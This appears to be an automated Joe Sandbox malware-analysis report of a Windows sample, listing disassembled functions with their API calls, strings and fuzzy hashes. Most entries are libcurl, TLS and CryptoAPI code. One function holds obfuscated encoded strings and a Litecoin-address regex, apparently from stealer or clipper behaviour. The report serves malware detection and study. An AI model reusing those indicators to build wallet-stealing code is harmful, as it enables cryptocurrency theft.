Opcode Fuzzy Hash: 73a7d42cefd9380d410c671d9e8b545f8758e5498e593acdf3a40c8b91da4c51
Instruction Fuzzy Hash: 4D72D371B0C68246FB64AB9994803B9A790FF05790FC81135DAAD877C5EFBCE450B3A0

Function 00007FF7F13284A0 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMONLIBRARYCODE

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7F13284EE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1328B5A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1328CD0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1328F8E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13291AE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13293EB
memcpy_s.LIBCPMT ref: 00007FF7F13294C6
memcpy_s.LIBCPMT ref: 00007FF7F1329571
memcpy_s.LIBCPMT ref: 00007FF7F1329640

Strings

1#IND, xrefs: 00007FF7F13285DB
1#QNAN, xrefs: 00007FF7F1328607
1#SNAN, xrefs: 00007FF7F13285FE
1#INF, xrefs: 00007FF7F1328617

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 1afb5782a578c52eaa61dbd51cd53ba35ff4d20e572f0a8b6a17f1389b3d208d
Instruction ID: eafbff14b0eee1a327811d7f617be7c50648ad8374452199e66c92fe733d00ad
Opcode Fuzzy Hash: 1afb5782a578c52eaa61dbd51cd53ba35ff4d20e572f0a8b6a17f1389b3d208d
Instruction Fuzzy Hash: A6B2F672E182D28BE724AE25D8507FCB7E1FF54348F905179DA2D57AC8DBB8A500CB90

Function 00007FF7F1288218 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 306COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1288330
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1288336
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1288454
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128845A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1288578
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128857E

Part of subcall function 00007FF7F132C560: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132C65A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128869C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F12886A2

Strings

GkEtESJdWlZCHwhMBgJZCChVDCNMIz9ZKFhVfTKL6FKWKGGTFKPcrQej5umtgtNtVqt1VWQVCjlMN15ZSzQDdlxNVVsJW00=, xrefs: 00007FF7F12885D5
EDIgQDUVXxNJaVA8FlxHDw==, xrefs: 00007FF7F128838D
GlkZNl9ZSwhVIihMKzIPRlkFYA==, xrefs: 00007FF7F12884B1
bDJQXjIvE0QTKUQbLEI8OEQ2FEQ7XEJNLxJKcUVSWRIIEApJH1lMVA5ZCDQDd1AcRA==, xrefs: 00007FF7F1288269
^(L|M)(?:[a-km-zA-HJ-NP-Z1-9]{26,34}|ltc1[a-zA-Z0-9]{28,48})$, xrefs: 00007FF7F12886F3

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: EDIgQDUVXxNJaVA8FlxHDw==$GkEtESJdWlZCHwhMBgJZCChVDCNMIz9ZKFhVfTKL6FKWKGGTFKPcrQej5umtgtNtVqt1VWQVCjlMN15ZSzQDdlxNVVsJW00=$GlkZNl9ZSwhVIihMKzIPRlkFYA==$^(L|M)(?:[a-km-zA-HJ-NP-Z1-9]{26,34}|ltc1[a-zA-Z0-9]{28,48})$$bDJQXjIvE0QTKUQbLEI8OEQ2FEQ7XEJNLxJKcUVSWRIIEApJH1lMVA5ZCDQDd1AcRA==
API String ID: 3668304517-735059408
Opcode ID: c6bff64f5341b481e5749a2980f68107c82ee5f690dd7f90f8b6c65d5c443bfb
Instruction ID: 91b13cb7fd99a8f9e877fece26dc70cf12b10860233eb3608ad2ffd0a800d294
Opcode Fuzzy Hash: c6bff64f5341b481e5749a2980f68107c82ee5f690dd7f90f8b6c65d5c443bfb
Instruction Fuzzy Hash: 37E1FA52F18B9689FB00EBB5D8412BCA730BF95794F901336D97C51AD5EFAC6180C3A0

Function 00007FF7F12F1EC0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 168encryptionCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32 ref: 00007FF7F12F2030
CertAddCertificateContextToStore.CRYPT32 ref: 00007FF7F12F205D
CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12F206A
GetLastError.KERNEL32 ref: 00007FF7F12F207C

Strings

schannel: did not add any certificates from CA file '%s', xrefs: 00007FF7F12F1F55
-----END CERTIFICATE-----, xrefs: 00007FF7F12F1F9B
schannel: failed to extract certificate from CA file '%s': %s, xrefs: 00007FF7F12F20EA
schannel: CA file '%s' is not correctly formatted, xrefs: 00007FF7F12F1FB9
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F12F1F2B
schannel: added %d certificate(s) from CA file '%s', xrefs: 00007FF7F12F2106
schannel: unexpected content type '%lu' when extracting certificate from CA file '%s', xrefs: 00007FF7F12F20B6
schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 00007FF7F12F209A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%lu' when extracting certificate from CA file '%s'
API String ID: 854292303-2991118681
Opcode ID: 711fbda6a74f74bcfbd9c1e7846d2bff2021355d056f4584b7db94b8f7b63687
Instruction ID: 51431946a92af96bf119ff52b40d1aaa5d6e486ff5c2063abe7adda4f7da8449
Opcode Fuzzy Hash: 711fbda6a74f74bcfbd9c1e7846d2bff2021355d056f4584b7db94b8f7b63687
Instruction Fuzzy Hash: 7C61C125B0C78282FB20AB95E9002BAE691AF45B90FC41139DE6D877C5DFBCE545C7A0

Function 00007FF7F12BBFE0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 342COMMON

Download Yara Rule

Strings

127.0.0.1, xrefs: 00007FF7F12BC32E
Hostname %s was found in DNS cache, xrefs: 00007FF7F12BC0CF
.localhost, xrefs: 00007FF7F12BC28E
localhost, xrefs: 00007FF7F12BC254
Not resolving .onion address (RFC 7686), xrefs: 00007FF7F12BC073
.onion, xrefs: 00007FF7F12BC04F
::1, xrefs: 00007FF7F12BC40F
.onion., xrefs: 00007FF7F12BC063

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
API String ID: 356670603-2421204314
Opcode ID: 9f7fcde81f8b245123f1bdbfa2f7829690056eceb82729a51843edb999978ab8
Instruction ID: 5c4490f8ff8975846742c3a28898205f5d59055a59883c410cb3437be4d6a21a
Opcode Fuzzy Hash: 9f7fcde81f8b245123f1bdbfa2f7829690056eceb82729a51843edb999978ab8
Instruction Fuzzy Hash: 24E1D262B0868285FB14EBA981503BDA7A1FB49B98F844135CE2D877C5DFBCE155C3A0

Function 00007FF7F12F23F0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 155encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F12ED430: GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
Part of subcall function 00007FF7F12ED430: GetProcAddress.KERNEL32 ref: 00007FF7F12ED486

CertGetNameStringA.CRYPT32 ref: 00007FF7F12F245D

Strings

schannel: Empty DNS name., xrefs: 00007FF7F12F25AA
schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 00007FF7F12F255B
schannel: CertFindExtension() returned no extension., xrefs: 00007FF7F12F24F6
schannel: Null certificate context., xrefs: 00007FF7F12F249C
schannel: Null certificate info., xrefs: 00007FF7F12F24BE
schannel: Not enough memory to list all hostnames., xrefs: 00007FF7F12F2658
2.5.29.17, xrefs: 00007FF7F12F24DE, 00007FF7F12F2520

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressCertHandleModuleNameProcString
String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all hostnames.$schannel: Null certificate context.$schannel: Null certificate info.
API String ID: 4138448956-4204188966
Opcode ID: 31a81374fe475fb18e482c13072433154e8a010969dd2f00a420c495b7635f9d
Instruction ID: 7c6b41f25c781c98755ec685d07a6ef945af22fd06f0117a9c8c6a978f84ce4e
Opcode Fuzzy Hash: 31a81374fe475fb18e482c13072433154e8a010969dd2f00a420c495b7635f9d
Instruction Fuzzy Hash: C161B322B0864286E714AB54D4003B9BBA0FB95B94F944139DE7E877D4DFBCD885C7A0

Function 00007FF7F12A7930 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 249COMMON

Download Yara Rule

APIs

_vfwprintf_l.LIBCMT ref: 00007FF7F12A7A0C

Strings

public key hash: sha256//%s, xrefs: 00007FF7F12A7A29
sha256//, xrefs: 00007FF7F12A7990, 00007FF7F12A7AAF
;sha256//, xrefs: 00007FF7F12A7A61
-----BEGIN PUBLIC KEY-----, xrefs: 00007FF7F12A7BBB
-----END PUBLIC KEY-----, xrefs: 00007FF7F12A7BEF
Z, xrefs: 00007FF7F12A7CCD
Z, xrefs: 00007FF7F12A7949

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _vfwprintf_l
String ID: -----END PUBLIC KEY-----$ public key hash: sha256//%s$-----BEGIN PUBLIC KEY-----$;sha256//$Z$Z$sha256//
API String ID: 1692953108-1456817947
Opcode ID: 881d280bd280b3b4bceace73ffbff585b8d3042f5e10cee0b85b02c8c623d9d0
Instruction ID: 5f3058f047a493b2164ea82b873f591501a8b93ff6d49dad0eacc6f404321681
Opcode Fuzzy Hash: 881d280bd280b3b4bceace73ffbff585b8d3042f5e10cee0b85b02c8c623d9d0
Instruction Fuzzy Hash: 42A1C321B0C74282FB14BF91A45037AD692AF49BE4F880035DD6D877D6EFBDE54483A4

Function 00007FF7F12D2930 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178COMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 00007FF7F12D2AB5
sendto.WS2_32 ref: 00007FF7F12D2B3A
sendto.WS2_32 ref: 00007FF7F12D2BFB

Strings

tftp_rx: internal error, xrefs: 00007FF7F12D297B
Received unexpected DATA packet block %d, expecting block %d, xrefs: 00007FF7F12D2C3C
Received last DATA packet block %d again., xrefs: 00007FF7F12D2B87
Timeout waiting for block %d ACK. Retries = %d, xrefs: 00007FF7F12D299F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: sendto
String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
API String ID: 1876886790-2691569196
Opcode ID: bde2f230d248fa6f7c5c63bf81ab7ab36f0c8e8e2bf012c96856f5cc82624816
Instruction ID: 79b4aca46be01e4b6043687ced1b62ea06fef2082969df0a48a4f70af9251bf8
Opcode Fuzzy Hash: bde2f230d248fa6f7c5c63bf81ab7ab36f0c8e8e2bf012c96856f5cc82624816
Instruction Fuzzy Hash: F8919072608AC1C5D761DF29D8443A97BA0EB88F98F44803ADE5D8B3A8DF78D545C760

Function 00007FF7F12F9F20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F12F9F68
CryptCreateHash.ADVAPI32 ref: 00007FF7F12F9F8C
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12F9F9D
CryptHashData.ADVAPI32 ref: 00007FF7F12F9FDB
CryptGetHashParam.ADVAPI32 ref: 00007FF7F12F9FFB
CryptGetHashParam.ADVAPI32 ref: 00007FF7F12FA01E
CryptDestroyHash.ADVAPI32 ref: 00007FF7F12FA02E
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12FA040

Strings

@, xrefs: 00007FF7F12F9F3E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Crypt$Hash$Context$ParamRelease$AcquireCreateDataDestroy
String ID: @
API String ID: 1945989244-2766056989
Opcode ID: 19c3bd699b459af425bc2cb279aba6aeae0e93eaeee79a9fd5b500243dee1a8f
Instruction ID: 785e2a981228199dd44b466fc9d4f200074d12ac7d48b51e948a16acbc881609
Opcode Fuzzy Hash: 19c3bd699b459af425bc2cb279aba6aeae0e93eaeee79a9fd5b500243dee1a8f
Instruction Fuzzy Hash: A9319026B1C68587EB609F61A45462AF3A0FFC8B80F805039EA9E47A98CF7DD4058B50

Function 00007FF7F12AACF0 Relevance: 15.5, Strings: 12, Instructions: 546COMMON

Download Yara Rule

Strings

No connections available., xrefs: 00007FF7F12AB662
host, xrefs: 00007FF7F12AB4A9
Re-using existing connection with %s %s, xrefs: 00007FF7F12AB4B7
No connections available in cache, xrefs: 00007FF7F12AB516
NTLM picked AND auth done set, clear picked, xrefs: 00007FF7F12AB587
proxy, xrefs: 00007FF7F12AB4A2
anonymous, xrefs: 00007FF7F12AAE79
%u/%d/%s, xrefs: 00007FF7F12AB046
Allowing DoH to override max connection limit, xrefs: 00007FF7F12AB520
ftp@example.com, xrefs: 00007FF7F12AAE80
NTLM-proxy picked AND auth done set, clear picked, xrefs: 00007FF7F12AB5B5
No more connections allowed to host, xrefs: 00007FF7F12AB653

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
API String ID: 0-2902238462
Opcode ID: 0d6909ed43f0c5169130c18b1ed6fd7ff846c47aa53a5bd75b8f320cae4069d0
Instruction ID: bda0086999d7f5f8ac99ebe22cf9f4ca02b7c8e800a90f6303c33b5b73cc0165
Opcode Fuzzy Hash: 0d6909ed43f0c5169130c18b1ed6fd7ff846c47aa53a5bd75b8f320cae4069d0
Instruction Fuzzy Hash: DF42B122A087C285EB51EFA194507FCA7A4EF45B98F894036CE6D8B3D5DFB8D544C3A0

Function 00007FF7F12AC830 Relevance: 14.2, Strings: 11, Instructions: 453COMMON

Download Yara Rule

Strings

disabled, xrefs: 00007FF7F12ACF8E
Protocol "%s" %s%s, xrefs: 00007FF7F12ACF99
Switched from HTTP to HTTPS due to HSTS => %s, xrefs: 00007FF7F12ACBD9
Too long hostname (maximum is %d), xrefs: 00007FF7F12ACBBB
%s://%s, xrefs: 00007FF7F12AC8C8
URL rejected: %s, xrefs: 00007FF7F12AC95C
not supported, xrefs: 00007FF7F12ACF7F
file, xrefs: 00007FF7F12ACA37, 00007FF7F12ACEDC
(in redirect), xrefs: 00007FF7F12ACF6A
http, xrefs: 00007FF7F12ACAD5
https, xrefs: 00007FF7F12ACB14

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: (in redirect)$%s://%s$Protocol "%s" %s%s$Switched from HTTP to HTTPS due to HSTS => %s$Too long hostname (maximum is %d)$URL rejected: %s$disabled$file$http$https$not supported
API String ID: 0-2601942094
Opcode ID: f13a9d90e823b9bdb2e1ddc3be97899f4d48ef658dc787749694039583c6e433
Instruction ID: fe9209c7db3eabc3b3dbba2a2b393b865187732932141638a630862da11a456c
Opcode Fuzzy Hash: f13a9d90e823b9bdb2e1ddc3be97899f4d48ef658dc787749694039583c6e433
Instruction Fuzzy Hash: 4212B332B0868392FB58AAA995543F9A694FF45B50FC44036DB6DC76C1DFBCE520C3A0

Function 00007FF7F12D9370 Relevance: 14.1, Strings: 11, Instructions: 352COMMON

Download Yara Rule

Strings

<%s>, xrefs: 00007FF7F12D948B, 00007FF7F12D95DC
%lld, xrefs: 00007FF7F12D9710
SIZE=, xrefs: 00007FF7F12D9803
Mime-Version, xrefs: 00007FF7F12D9686
<%s@%s>, xrefs: 00007FF7F12D9468, 00007FF7F12D95B9
MAIL FROM:%s%s%s%s%s%s, xrefs: 00007FF7F12D982B
state change from %s to %s, xrefs: 00007FF7F12D989C
MAIL, xrefs: 00007FF7F12D988B
AUTH=, xrefs: 00007FF7F12D97F7
SMTPUTF8, xrefs: 00007FF7F12D97EC
Mime-Version: 1.0, xrefs: 00007FF7F12D96A1

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: AUTH=$ SIZE=$ SMTPUTF8$%lld$<%s>$<%s@%s>$MAIL$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0$state change from %s to %s
API String ID: 0-2592802878
Opcode ID: ca17d0a8c02d089f7a46fdc6780435cae035b93c23eb9a914159671ddadb30a1
Instruction ID: 7fb589eab9d9117fc2e8777e7570356dba6e8fa3caad7b0fcac3f7954504e80a
Opcode Fuzzy Hash: ca17d0a8c02d089f7a46fdc6780435cae035b93c23eb9a914159671ddadb30a1
Instruction Fuzzy Hash: 75E19E62B08A4286FF55BB61E4202B9B3A0EF45B94FC44135ED6D866D1EFBCE504C3A0

Function 00007FF7F12CCC50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F12CCCAD
CryptCreateHash.ADVAPI32 ref: 00007FF7F12CCCD5
CryptHashData.ADVAPI32 ref: 00007FF7F12CCCED
CryptGetHashParam.ADVAPI32 ref: 00007FF7F12CCD13
CryptGetHashParam.ADVAPI32 ref: 00007FF7F12CCD40
CryptDestroyHash.ADVAPI32 ref: 00007FF7F12CCD50
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12CCD62

Strings

@, xrefs: 00007FF7F12CCC9B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID: @
API String ID: 3606780921-2766056989
Opcode ID: 6ec95521a9f1253f2e0b5427e519efae6c14c2ba02baa511e5147bf8191f6905
Instruction ID: f8ca223dae127538040d48ab83c55901433bc23d77940be6e16442338f9804d7
Opcode Fuzzy Hash: 6ec95521a9f1253f2e0b5427e519efae6c14c2ba02baa511e5147bf8191f6905
Instruction Fuzzy Hash: 9431A22670868183EB50EF65E54066AEBA0FFC8B90F844035EB8E57B94CF3CD045DB54

Function 00007FF7F12F7B50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 112encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F12F7B97
CryptImportKey.ADVAPI32 ref: 00007FF7F12F7C6C
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12F7C84
CryptEncrypt.ADVAPI32 ref: 00007FF7F12F7CB5
CryptDestroyKey.ADVAPI32 ref: 00007FF7F12F7CBF
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12F7CCB

Strings

@, xrefs: 00007FF7F12F7B7D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
String ID: @
API String ID: 3016261861-2766056989
Opcode ID: 3cae7e76ca43f66747581ad8ed83d0bd808e6ce8b4ed0286606008c693e6c089
Instruction ID: 853116139e139c7b38bb811610d52931201b3d4e4442fda18c5e76a73eb18125
Opcode Fuzzy Hash: 3cae7e76ca43f66747581ad8ed83d0bd808e6ce8b4ed0286606008c693e6c089
Instruction Fuzzy Hash: 7541B066B046908EF7109BB5D4503EE7BB1FB46348F444025DEAD53A89CB3CD11AE760

Function 00007FF7F12B94A0 Relevance: 11.6, Strings: 9, Instructions: 315COMMON

Download Yara Rule

Strings

Issue another request to this URL: '%s', xrefs: 00007FF7F12B9889
Maximum (%ld) redirects followed, xrefs: 00007FF7F12B994A
Switch to %s, xrefs: 00007FF7F12B98FE
Switch from POST to GET, xrefs: 00007FF7F12B998C
The redirect target URL could not be parsed: %s, xrefs: 00007FF7F12B969B
GET, xrefs: 00007FF7F12B98EC
Clear auth, redirects scheme from %s to %s, xrefs: 00007FF7F12B97EB
HEAD, xrefs: 00007FF7F12B98E5
Clear auth, redirects to port from %u to %u, xrefs: 00007FF7F12B978A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
